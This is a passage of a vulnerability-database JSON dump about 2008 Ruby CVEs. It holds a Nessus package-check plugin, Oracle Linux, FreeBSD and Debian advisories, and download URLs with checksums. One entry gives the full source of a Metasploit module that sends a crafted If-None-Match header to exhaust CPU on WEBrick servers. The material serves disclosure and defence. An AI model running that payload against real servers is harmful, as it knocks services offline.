recursively nested XML entities can lead to denial of\n service through resource exhaustion in rexml.\n\n - CVE-2008-3905\n Tanaka Akira discovered that the resolv module uses\n sequential transaction IDs and a fixed source port for\n DNS queries, which makes it more vulnerable to DNS\n spoofing attacks.", "edition": 28, "published": "2008-10-13T00:00:00", "title": "Debian DSA-1651-1 : ruby1.8 - several vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3655", "CVE-2008-3657", "CVE-2008-3905", "CVE-2008-3790", "CVE-2008-3656"], "modified": "2008-10-13T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:ruby1.8", "cpe:/o:debian:debian_linux:4.0"], "id": "DEBIAN_DSA-1651.NASL", "href": "https://www.tenable.com/plugins/nessus/34387", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1651. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(34387);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2008-3655\", \"CVE-2008-3656\", \"CVE-2008-3657\", \"CVE-2008-3790\", \"CVE-2008-3905\");\n script_bugtraq_id(30644, 30802, 31699);\n script_xref(name:\"DSA\", value:\"1651\");\n\n script_name(english:\"Debian DSA-1651-1 : ruby1.8 - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in the interpreter for\nthe Ruby language, which may lead to denial of service and other\nsecurity problems. The Common Vulnerabilities and Exposures project\nidentifies the following problems :\n\n - CVE-2008-3655\n Keita Yamaguchi discovered that several safe level\n restrictions are insufficiently enforced.\n\n - CVE-2008-3656\n Christian Neukirchen discovered that the WebRick module\n uses inefficient algorithms for HTTP header splitting,\n resulting in denial of service through resource\n exhaustion.\n\n - CVE-2008-3657\n It was discovered that the dl module doesn't perform\n taintness checks.\n\n - CVE-2008-3790\n Luka Treiber and Mitja Kolsek discovered that\n recursively nested XML entities can lead to denial of\n service through resource exhaustion in rexml.\n\n - CVE-2008-3905\n Tanaka Akira discovered that the resolv module uses\n sequential transaction IDs and a fixed source port for\n DNS queries, which makes it more vulnerable to DNS\n spoofing attacks.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-3655\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-3656\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-3657\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-3790\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-3905\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2008/dsa-1651\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the ruby1.8 packages.\n\nFor the stable distribution (etch), these problems have been fixed in\nversion 1.8.5-4etch3. Packages for arm will be provided later.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 264, 287, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby1.8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/10/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/10/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"4.0\", prefix:\"irb1.8\", reference:\"1.8.5-4etch3\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libdbm-ruby1.8\", reference:\"1.8.5-4etch3\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libgdbm-ruby1.8\", reference:\"1.8.5-4etch3\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libopenssl-ruby1.8\", reference:\"1.8.5-4etch3\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libreadline-ruby1.8\", reference:\"1.8.5-4etch3\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libruby1.8\", reference:\"1.8.5-4etch3\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libruby1.8-dbg\", reference:\"1.8.5-4etch3\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libtcltk-ruby1.8\", reference:\"1.8.5-4etch3\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"rdoc1.8\", reference:\"1.8.5-4etch3\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"ri1.8\", reference:\"1.8.5-4etch3\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"ruby1.8\", reference:\"1.8.5-4etch3\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"ruby1.8-dev\", reference:\"1.8.5-4etch3\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"ruby1.8-elisp\", reference:\"1.8.5-4etch3\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"ruby1.8-examples\", reference:\"1.8.5-4etch3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:39:25", "bulletinFamily": "unix", "cvelist": ["CVE-2008-4310", "CVE-2008-1145", "CVE-2008-3656"], "description": "[1.8.5-5.el5_2.6]\n- security fix (#470262)\n- CVE-2008-4310: real fix for CVE-2008-3656. original patch named as fix for\n CVE-2008-3656 actually fixed different issue (CVE-2008-1145),\n hence we are providing correct patch and renaming original\n patch to refer to proper CVE.", "edition": 4, "modified": "2008-12-04T00:00:00", "published": "2008-12-04T00:00:00", "id": "ELSA-2008-0981", "href": "http://linux.oracle.com/errata/ELSA-2008-0981.html", "title": "ruby security update", "type": "oraclelinux", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:35:03", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3655", "CVE-2008-3443", "CVE-2008-1145", "CVE-2008-3657", "CVE-2008-3905", "CVE-2008-3790", "CVE-2008-3656"], "description": "[1.8.5-5.el5_2.5]\n- Build with -fno-strict-aliasing.\n[1.8.5-5.el5_2.4]\n- security fixes. (#461590)\n- CVE-2008-3655: multiple insufficient safe mode restrictions.\n- CVE-2008-3656: WEBrick DoS vulnerability (CPU consumption).\n- CVE-2008-3657: missing taintness checks in dl module.\n- CVE-2008-3905: use of predictable source port and transaction id in DNS\n requests done by resolv.rb module.\n- CVE-2008-3443: Memory allocation failure in Ruby regex engine\n (remotely exploitable DoS).\n- CVE-2008-3790: DoS vulnerability in the REXML module.", "edition": 4, "modified": "2008-10-21T00:00:00", "published": "2008-10-21T00:00:00", "id": "ELSA-2008-0897", "href": "http://linux.oracle.com/errata/ELSA-2008-0897.html", "title": "ruby security update", "type": "oraclelinux", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "metasploit": [{"lastseen": "2020-07-24T20:36:02", "description": "The WEBrick::HTTP::DefaultFileHandler in WEBrick in Ruby 1.8.5 and earlier, 1.8.6 to 1.8.6-p286, 1.8.7 to 1.8.7-p71, and 1.9 to r18423 allows for a DoS (CPU consumption) via a crafted HTTP request.\n", "published": "2008-10-17T15:40:20", "type": "metasploit", "title": "Ruby WEBrick::HTTP::DefaultFileHandler DoS", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-3656"], "modified": "2017-07-24T13:26:21", "id": "MSF:AUXILIARY/DOS/HTTP/WEBRICK_REGEX", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Ruby WEBrick::HTTP::DefaultFileHandler DoS',\n 'Description' => %q{\n The WEBrick::HTTP::DefaultFileHandler in WEBrick in\n Ruby 1.8.5 and earlier, 1.8.6 to 1.8.6-p286, 1.8.7\n to 1.8.7-p71, and 1.9 to r18423 allows for a DoS\n (CPU consumption) via a crafted HTTP request.\n },\n 'Author' => 'kris katterjohn',\n 'License' => MSF_LICENSE,\n 'References' => [\n [ 'BID', '30644'],\n [ 'CVE', '2008-3656'],\n [ 'OSVDB', '47471' ],\n [ 'URL', 'http://www.ruby-lang.org/en/news/2008/08/08/multiple-vulnerabilities-in-ruby/']\n ],\n 'DisclosureDate' => 'Aug 08 2008'))\n\n register_options([\n OptString.new('URI', [ true, 'URI to request', '/' ])\n ])\n end\n\n def run\n begin\n o = {\n 'uri' => normalize_uri(datastore['URI']),\n 'headers' => {\n 'If-None-Match' => %q{foo=\"\"} + %q{bar=\"baz\" } * 100\n }\n }\n\n c = connect(o)\n c.send_request(c.request_raw(o))\n\n print_status(\"Request sent to #{rhost}:#{rport}\")\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout\n print_status(\"Couldn't connect to #{rhost}:#{rport}\")\n rescue ::Timeout::Error, ::Errno::EPIPE\n end\n end\nend\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/http/webrick_regex.rb"}], "freebsd": [{"lastseen": "2019-05-29T18:34:24", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3655", "CVE-2008-3905", "CVE-2008-3656"], "description": "\nThe official ruby site reports:\n\nSeveral vulnerabilities in safe level have been discovereds:.\n\nuntrace_var is permitted at safe level 4;\n$PROGRAM_NAME may be modified at safe level 4;\ninsecure methods may be called at safe level 1-3;\nsyslog operations are permitted at safe level 4;\ndl doesn't check taintness, so it could allow attackers\n\t to call dangerous functions.\n\n\n", "edition": 4, "modified": "2010-05-12T00:00:00", "published": "2008-08-08T00:00:00", "id": "C329712A-6B5B-11DD-9D79-001FC61C2A55", "href": "https://vuxml.freebsd.org/freebsd/c329712a-6b5b-11dd-9d79-001fc61c2a55.html", "title": "ruby -- multiple vulnerabilities in safe level", "type": "freebsd", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:34:24", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3655", "CVE-2008-3905", "CVE-2008-3656"], "description": "\nThe official ruby site reports:\n\nWEBrick::HTTP::DefaultFileHandler is faulty of exponential time\n\t taking requests due to a backtracking regular expression in\n\t WEBrick::HTTPUtils.split_header_value.\n\n", "edition": 4, "modified": "2010-05-12T00:00:00", "published": "2008-08-08T00:00:00", "id": "F7BA20AA-6B5A-11DD-9D79-001FC61C2A55", "href": "https://vuxml.freebsd.org/freebsd/f7ba20aa-6b5a-11dd-9d79-001fc61c2a55.html", "title": "ruby -- DoS vulnerability in WEBrick", "type": "freebsd", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "debian": [{"lastseen": "2020-11-11T13:30:53", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3655", "CVE-2008-3657", "CVE-2008-3905", "CVE-2008-3790", "CVE-2008-3656"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1652-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nOctober 12, 2008 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : ruby1.9\nVulnerability : several\nProblem-Type : local(remote)\nDebian-specific: no\nCVE ID : CVE-2008-3655 CVE-2008-3656 CVE-2008-3657 CVE-2008-3790 CVE-2008-3905\n\nSeveral vulnerabilities have been discovered in the interpreter for\nthe Ruby language, which may lead to denial of service and other\nsecurity problems. The Common Vulnerabilities and Exposures project\nidentifies the following problems:\n\nCVE-2008-3655\n\n Keita Yamaguchi discovered that several safe level restrictions\n are insufficiently enforced.\n \nCVE-2008-3656\n\n Christian Neukirchen discovered that the WebRick module uses\n inefficient algorithms for HTTP header splitting, resulting in\n denial of service through resource exhaustion.\n\nCVE-2008-3657\n\n It was discovered that the dl module doesn't perform taintness\n checks.\n\nCVE-2008-3790\n\n Luka Treiber and Mitja Kolsek discovered that recursively nested\n XML entities can lead to denial of service through resource\n exhaustion in rexml.\n\nCVE-2008-3905\n\n Tanaka Akira discovered that the resolv module uses sequential\n transaction IDs and a fixed source port for DNS queries, which\n makes it more vulnerable to DNS spoofing attacks.\n\nFor the stable distribution (etch), these problems have been fixed in\nversion 1.9.0+20060609-1etch3. Packages for arm will be provided later.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.9.0.2-6.\n\nWe recommend that you upgrade your ruby1.9 packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nStable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609.orig.tar.gz\n Size/MD5 checksum: 4450198 483d9b46a973c7e14f7586f0b1129891\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch3.diff.gz\n Size/MD5 checksum: 32500 f9ecc42746b8a277f0adf684db941813\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch3.dsc\n Size/MD5 checksum: 1102 d9f8325a51dc85e7a592135602aa5adb\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/rdoc1.9_1.9.0+20060609-1etch3_all.deb\n Size/MD5 checksum: 318568 8829c7b1dc51b1694ec44c22df0b9aa2\n http://security.debian.org/pool/updates/main/r/ruby1.9/irb1.9_1.9.0+20060609-1etch3_all.deb\n Size/MD5 checksum: 255728 98a8ba887948dad97e365d6fe4cd7365\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-examples_1.9.0+20060609-1etch3_all.deb\n Size/MD5 checksum: 265788 baf95223f575afea5a19eda8931ab20f\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-elisp_1.9.0+20060609-1etch3_all.deb\n Size/MD5 checksum: 229404 5fd60bd0423a2bf3e7b7d9f2fdbf50f8\n http://security.debian.org/pool/updates/main/r/ruby1.9/ri1.9_1.9.0+20060609-1etch3_all.deb\n Size/MD5 checksum: 694282 195e55b70aaf9f35ff0b3156460c05a0\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch3_alpha.deb\n Size/MD5 checksum: 217526 18e248f393c0157029127735d35ab58c\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch3_alpha.deb\n Size/MD5 checksum: 237710 40f6ac2464dd488bcec0d9e705457071\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch3_alpha.deb\n Size/MD5 checksum: 324622 3daf8b07570c96d9575c851ab21deae3\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch3_alpha.deb\n Size/MD5 checksum: 340188 8e9d2e6f51f659ad6df94a11961b6429\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch3_alpha.deb\n Size/MD5 checksum: 1890052 15fa703f9493159f200bc8719305f8f7\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch3_alpha.deb\n Size/MD5 checksum: 216796 19318b591b6bce163cd767ccbc8e55a0\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch3_alpha.deb\n Size/MD5 checksum: 1881332 5b980e23f25edf7bbc978bbdfb2ffa18\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch3_alpha.deb\n Size/MD5 checksum: 217544 96ac4e52a0ddbf2a70ae8a49b8468338\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch3_alpha.deb\n Size/MD5 checksum: 961014 16b8cfc9ec220aed8a4a6d83b7a903f3\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch3_amd64.deb\n Size/MD5 checksum: 216496 a612ba557549caf4ba25abe252da8568\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch3_amd64.deb\n Size/MD5 checksum: 346006 8ea61f15325461d26752621150af4c55\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch3_amd64.deb\n Size/MD5 checksum: 1878306 97b41d5d6a9d13ceab9139faf6ec9f36\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch3_amd64.deb\n Size/MD5 checksum: 235552 8767d4d810273a9f0177a47a0a08c073\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch3_amd64.deb\n Size/MD5 checksum: 1850520 0750131f3c14ce426f121099858f02f0\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch3_amd64.deb\n Size/MD5 checksum: 216560 5eb826cce7459050017b7085685e996c\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch3_amd64.deb\n Size/MD5 checksum: 216012 d89ffb0add351472565804edf8dac758\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch3_amd64.deb\n Size/MD5 checksum: 807498 f23ac4d1e46337667e6869d896a2c86a\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch3_amd64.deb\n Size/MD5 checksum: 323396 fd36007f61327bb9e05127cd35e6a2d6\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch3_hppa.deb\n Size/MD5 checksum: 888820 f2a52e9d4019c7c6e36df9a557bb2162\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch3_hppa.deb\n Size/MD5 checksum: 217900 86d51cf0dc80bdbd9d25a39b17eee678\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch3_hppa.deb\n Size/MD5 checksum: 217536 3ee4c34f85a0dd8b4f8a328a5e8fbc00\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch3_hppa.deb\n Size/MD5 checksum: 1861420 68df4ad96fd1065b76bf391d753ad79e\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch3_hppa.deb\n Size/MD5 checksum: 236956 e465433f9cb8186a8326455d59910cc2\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch3_hppa.deb\n Size/MD5 checksum: 1880706 d811527595c9c70569d60581b0b540ea\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch3_hppa.deb\n Size/MD5 checksum: 218086 0fc503ce1be877ddcf1ed5110ebc35f5\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch3_hppa.deb\n Size/MD5 checksum: 333712 e26dd25bc69b683518214ffda7aa18fc\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch3_hppa.deb\n Size/MD5 checksum: 395486 d89dec7193f96ac9ea999af10815b0e4\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch3_i386.deb\n Size/MD5 checksum: 309582 1e3e3abbe9099df9839f022207104e4c\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch3_i386.deb\n Size/MD5 checksum: 216578 6c8c40b3bac4b3008ca37c11d1c15b71\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch3_i386.deb\n Size/MD5 checksum: 216352 7ad6c7c069d6922eadc2d51919f42346\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch3_i386.deb\n Size/MD5 checksum: 1752688 4c1a4ec5f90608f16b719070239f2dc8\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch3_i386.deb\n Size/MD5 checksum: 1867752 749baa15c5cdd78016acc2e4a4836f80\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch3_i386.deb\n Size/MD5 checksum: 237500 068288ec56066aad6cd3c0148fa9e6b1\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch3_i386.deb\n Size/MD5 checksum: 345708 f01d2d77673b54570e3afcf06afb7bb4\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch3_i386.deb\n Size/MD5 checksum: 215600 47671e30dd1a142519c40c1efc6559b9\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch3_i386.deb\n Size/MD5 checksum: 757964 c34682888461aa146d404c9dccb9f987\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch3_ia64.deb\n Size/MD5 checksum: 2225874 c1f834cdd95279bbf5eca576c3511088\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch3_ia64.deb\n Size/MD5 checksum: 220606 3c65aba37358087e1e26a16677e474f8\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch3_ia64.deb\n Size/MD5 checksum: 1095774 6d57aff7a609eb69ea57dfeb60b9d831\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch3_ia64.deb\n Size/MD5 checksum: 220140 46554d54bc95ad8bf90ec33d7c848358\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch3_ia64.deb\n Size/MD5 checksum: 236300 1e4719db3ca36aa6b04dc3a66bb3b4f2\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch3_ia64.deb\n Size/MD5 checksum: 220598 3cff195de849212b8bf1c0d2cb4f459b\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch3_ia64.deb\n Size/MD5 checksum: 351424 99c548dbb54ad64f2f15ec9d6cd1157b\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch3_ia64.deb\n Size/MD5 checksum: 351114 67c71c75847c6c24873a077214c6ddb8\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch3_ia64.deb\n Size/MD5 checksum: 1863980 ba885ff9a4bee389cdda5439f9b8838d\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch3_mips.deb\n Size/MD5 checksum: 216034 540daf8a0a152b77cbabc0ebf2a6cbe6\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch3_mips.deb\n Size/MD5 checksum: 215910 08152af050881fd103cbd3c6283f4c5f\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch3_mips.deb\n Size/MD5 checksum: 215178 6189e81e3d1fcb8bc3aa64ae688c6736\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch3_mips.deb\n Size/MD5 checksum: 1862054 3f09c78df3df2ecafca65180509eeb30\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch3_mips.deb\n Size/MD5 checksum: 236092 0a9c0b2b8031289e850c3a2c9a026e92\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch3_mips.deb\n Size/MD5 checksum: 874098 447b15d2db96e1d6212b721b70289aa9\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch3_mips.deb\n Size/MD5 checksum: 1680114 aa610eb8728da1c4d45b7d54a4b09058\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch3_mips.deb\n Size/MD5 checksum: 372246 96a282c7252c4edef7ba6712a26dfe6f\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch3_mips.deb\n Size/MD5 checksum: 301600 3d528eda6e6da71c3dc5bfb92ac7a131\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch3_mipsel.deb\n Size/MD5 checksum: 1837274 08174e2e8d1128b3977dedcd49d88adf\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch3_mipsel.deb\n Size/MD5 checksum: 215368 c53207b03169c21fae94fc9a252030e0\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch3_mipsel.deb\n Size/MD5 checksum: 216122 217425b4ced3f5e260f7c3e16067ccc9\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch3_mipsel.deb\n Size/MD5 checksum: 367470 ad1121d68848d0dd69c37ede15c611b1\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch3_mipsel.deb\n Size/MD5 checksum: 1667940 7a061e90f07190e08cb1d7dd87ceba0b\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch3_mipsel.deb\n Size/MD5 checksum: 299388 46bc91d4748b41dc94e047bab5dedd51\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch3_mipsel.deb\n Size/MD5 checksum: 216268 d71b6f0a4b75fb7e1251e69d746ca7c6\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch3_mipsel.deb\n Size/MD5 checksum: 858514 9670a0b7dae56385110e24a689a2bba8\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch3_mipsel.deb\n Size/MD5 checksum: 235568 f81cd64d18fd7d9ad05be290eaa3a2f7\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch3_powerpc.deb\n Size/MD5 checksum: 218494 e3554e99b745b152c5adceb8b792598b\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch3_powerpc.deb\n Size/MD5 checksum: 218182 5d950d3fe9d4144a4a113febc734a657\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch3_powerpc.deb\n Size/MD5 checksum: 312442 